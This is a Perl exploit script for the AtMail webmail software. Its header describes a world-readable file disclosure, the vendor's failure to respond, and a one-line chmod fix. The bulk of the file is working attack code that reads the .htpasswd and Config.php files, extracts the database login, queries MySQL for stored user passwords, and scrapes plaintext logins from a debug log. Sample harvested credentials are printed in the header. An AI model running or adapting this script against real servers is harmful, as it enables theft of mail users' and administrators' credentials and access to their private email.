#!/usr/bin/perl

################################################################################
#
#  LEGAL:
#       Permission is granted to freely reproduce this document in its entirety
#       under the condition that the contents are not altered in any way.
#       milw0rm IS permitted to add their standard footer: // milw0rm.com / date
#       Permission to view or reproduce this file is NOT granted to any
#       individual with the first name Gadi and the last name Evron, due to the
#       prior history of at least 1 individual with this name of making false
#       claims that researchers notified them about recently released exploits.
#
#  PRODUCT:
#       AtMail - atmail.com
#
#  VENDOR:
#       CalaCode - calacode.com
#
#  DOWNLOAD:
#       http://atmail.org/download/atmailopen.tgz
#       http://atmail.com/demo/atmailphpdemo.tgz
#
#  PROBLEM:
#       World readable files in the default install lead to sensitive
#       information disclosure, loss of integrity.
#
#  SOLUTION:
#       chmod 640 /path/to/Config.php /path/to/.htpasswd
#
#  NOTIFICATION:
#       5/27/2008 - Several emails were sent back and forth, explaining how the
#       world readable Config.php issue could be abused. Multiple subsequent
#       attempts to obtain a status update from the vendor were unreplied to.
#       It's now 07/29/2008. Instead of taking a few moments of their time to
#       bring the level of security of the servers this software is installed
#       on back up to the same level it was BEFORE this software was installed
#       (excluding any other vulnerabilities that may exist in this software),
#       the vendor is happily pushing their product at HostingCon at this time.
#       (JULY 28-30, 2008).
#
#  STATUS:
#       Not fixed.
#
#  USAGE:
#       ./atmail.pl
#
#       or simply use it as a CGI script. The vendor claims that ssh access is
#       required to abuse this issue. What they really mean is that all someone
#       needs is the ability to invoke a few commands from the shell. This is
#       easily done in countless ways without requiring authentication via ssh.
#
# +----------------------------------------------------+
# |       WEBADMIN USER CREDENTIALS (.htpasswd)        |
# +----------------------------------------------------+
# admin:$apr1$L.BPJMnK$sjep5SUN4PG5A.Anw5/Id0
#
# +----------------------------------------------------+
# |       DATABASE CREDENTIALS (Config.php)            |
# +----------------------------------------------------+
# USER: atmail
# PASS: AF4hubB493
# HOST: localhost
#
# +----------------------------------------------------+
# |       CLIENT CREDENTIALS (MySQL)                   |
# +----------------------------------------------------+
# USER: alice@atmail.com     PASS: atmail
# USER: bob@atmail.com       PASS: doesn't
# USER: carol@atmail.com     PASS: getit
#
# +----------------------------------------------------+
# |       MORE CLIENT CREDENTIALS (/tmp/popimap_debug) |
# +----------------------------------------------------+
# USER: alice      PASS: atmail
# USER: bob        PASS: doesn't
# USER: carol      PASS: getit
#
#
#   ADDED BONUS: client information persists in the database even after the user
#   has logged off.
#
#   To make this code work, you must fill in the paths. I don't condone
#   malicious use of the information provided in this script, just as I don't
#   condone vendor complacency.
#
#   If you have found any of this information to be useful to you or someone
#   you know,  PLEASE consider donating to the Julie Amero Defense Fund:
#
#   Official Blog
#   http://julieamer.blogspot.com
#
#   Trial Transcript
#   http://julieamero.blogspot.com
#
#   http://google.com/search?q=julie+amero
#
#   and/or contacting news outlets, state legislators, the prosecution, etc and
#   letting them know your thoughts in a polite and professional manner.
#
################################################################################

# print "Content-type: text/plain\n\n";

use strict;
use warnings;

my $atmail_path          = shift || '';
my $atmail_htpasswd_path = $atmail_path . '';
my $atmail_config_path   = $atmail_path . '';
my $atmail_popimap_debug = '';

my ( $sql_user, $sql_pass, $sql_host );

-e $atmail_path or die "$atmail_path does not exist\n";


###############################################################################
# For logging into https://example.com/atmail/webadmin
###############################################################################
if ( open my $atmail_htpasswd_path_fh, '<', $atmail_htpasswd_path )
{
    print_line();
    print "|\tWEBADMIN USER CREDENTIALS (.htpasswd)        |\n";
    print_line();

    while ( <$atmail_htpasswd_path_fh> ) {
        print;
    }

    close $atmail_htpasswd_path_fh;

    print "\n";

}

###############################################################################
# For accessing the atmail db
###############################################################################
if ( open my $atmail_config_fh, '<', $atmail_config_path )
{
    print_line();
    print "|\tDATABASE CREDENTIALS (Config.php)            |\n";
    print_line();

    while ( <$atmail_config_fh> )
    {
        $sql_user = $1 if ( m{ sql_user ' \s => \s ' (.*) ' , }ixms );
        $sql_pass = $1 if ( m{ sql_pass ' \s => \s ' (.*) ' , }ixms );
        $sql_host = $1 if ( m{ sql_host ' \s => \s ' (.*) ' , }ixms );
    }

    close $atmail_config_fh;

    print "USER: $sql_user\nPASS: $sql_pass\nHOST: $sql_host\n";

    print "\n";
}

###############################################################################
# For reading grandma's email
###############################################################################
my $sessions = "mysql -h $sql_host -u $sql_user -p$sql_pass atmail -e 'select * from UserSession \\G'";

if ( open my $mysql_fh, '-|', $sessions )
{
    print_line();
    print "|\tCLIENT CREDENTIALS (MySQL)                   |\n";
    print_line();

    while ( <$mysql_fh> )
    {
        if ( m{ Account: \s (\S+) }xms ) {
            print "USER: $1\t";
        }
        elsif ( m{ Password: \s (\S+) }xms ) {
            print "PASS: $1\n";
        }
    }

    close $mysql_fh;

    print "\n";
}
###############################################################################
# Debugging is not enabled by default, and you do have the choice of
# configuring the location of the debug log. The default is /tmp/popimap_debug
# which also presents a symlink attack issue if left to the default setting.
###############################################################################
if ( open my $popimap_debug_fh, '<', '/tmp/popimap_debug' )
{
    my %accounts;

    print_line();
    print "|\tMORE CLIENT CREDENTIALS (/tmp/popimap_debug) |\n";
    print_line();

    my ( $popimap_debug_user, $popimap_debug_pass );

    while ( <$popimap_debug_fh> )
    {
        if ( m{ \A C: \s ATMAIL00 \s LOGIN \s "(.*)" \s "(.*)" }ixms ) {
            $accounts{$1} = $2;
        }
    }

    close $popimap_debug_fh;

    while ( my ( $user, $pass ) = each ( %accounts ) ) {
        print "USER: $user\tPASS: $pass\n";
    }

    print "\n";
}

sub print_line
{
    print "+----------------------------------------------------+\n";
}